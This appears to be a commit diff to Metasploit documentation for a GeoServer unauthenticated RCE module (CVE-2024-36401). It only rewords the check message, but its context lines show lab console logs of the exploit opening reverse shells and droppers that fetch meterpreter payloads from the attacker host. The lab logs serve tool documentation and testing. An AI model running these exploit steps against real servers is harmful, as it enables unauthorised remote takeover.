@@ -155,7 +155,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
155
155
[*] Started reverse TCP handler on 192.168.201.8:4444
156
156
[*] Running automatic check ("set AutoCheck false" to disable)
157
157
[*] Trying to detect if target is running a vulnerable version of GeoServer.
158
- [+] The target is vulnerable. Version 2.23.5
158
+ [+] The target appears to be vulnerable. Version 2.23.5
159
159
[*] Executing Unix Command for cmd/unix/reverse_bash
160
160
[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000
161
161
@@ -180,7 +180,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
180
180
[*] Started reverse TCP handler on 192.168.201.8:4444
181
181
[*] Running automatic check ("set AutoCheck false" to disable)
182
182
[*] Trying to detect if target is running a vulnerable version of GeoServer.
183
- [+] The target is vulnerable. Version 2.23.5
183
+ [+] The target appears to be vulnerable. Version 2.23.5
184
184
[*] Executing Unix Command for cmd/unix/reverse_bash
185
185
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000
186
186
@@ -205,7 +205,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
205
205
[*] Started reverse TCP handler on 192.168.201.8:4444
206
206
[*] Running automatic check ("set AutoCheck false" to disable)
207
207
[*] Trying to detect if target is running a vulnerable version of GeoServer.
208
- [+] The target is vulnerable. Version 2.23.2
208
+ [+] The target appears to be vulnerable. Version 2.23.2
209
209
[*] Executing Unix Command for cmd/unix/reverse_bash
210
210
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000
211
211
@@ -229,7 +229,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
229
229
[*] Started reverse TCP handler on 192.168.201.8:4444
230
230
[*] Running automatic check ("set AutoCheck false" to disable)
231
231
[*] Trying to detect if target is running a vulnerable version of GeoServer.
232
- [+] The target is vulnerable. Version 2.23.2
232
+ [+] The target appears to be vulnerable. Version 2.23.2
233
233
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
234
234
[*] Using URL: http://192.168.201.8:1981/FEflDEJ
235
235
[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
@@ -261,7 +261,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
261
261
[*] Started reverse TCP handler on 192.168.201.8:4444
262
262
[*] Running automatic check ("set AutoCheck false" to disable)
263
263
[*] Trying to detect if target is running a vulnerable version of GeoServer.
264
- [+] The target is vulnerable. Version 2.25.0
264
+ [+] The target appears to be vulnerable. Version 2.25.0
265
265
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
266
266
[*] Using URL: http://192.168.201.8:1981/CEkJIBo
267
267
[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
@@ -295,7 +295,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
295
295
[*] Started reverse TCP handler on 192.168.201.8:4444
296
296
[*] Running automatic check ("set AutoCheck false" to disable)
297
297
[*] Trying to detect if target is running a vulnerable version of GeoServer.
298
- [+] The target is vulnerable. Version 2.23.5
298
+ [+] The target appears to be vulnerable. Version 2.23.5
299
299
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
300
300
[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
301
301
[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
@@ -331,7 +331,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
331
331
[ * ] Started reverse TCP handler on 172.16.199.1:4444
332
332
[ * ] Running automatic check ("set AutoCheck false" to disable)
333
333
[ * ] Trying to detect if target is running a vulnerable version of GeoServer.
334
- [ +] The target is vulnerable. Version 2.25.0
334
+ [ +] The target appears to be vulnerable. Version 2.25.0
335
335
[ * ] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
336
336
[ * ] Sending stage (201798 bytes) to 172.16.199.131
337
337
[ * ] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700
0 commit comments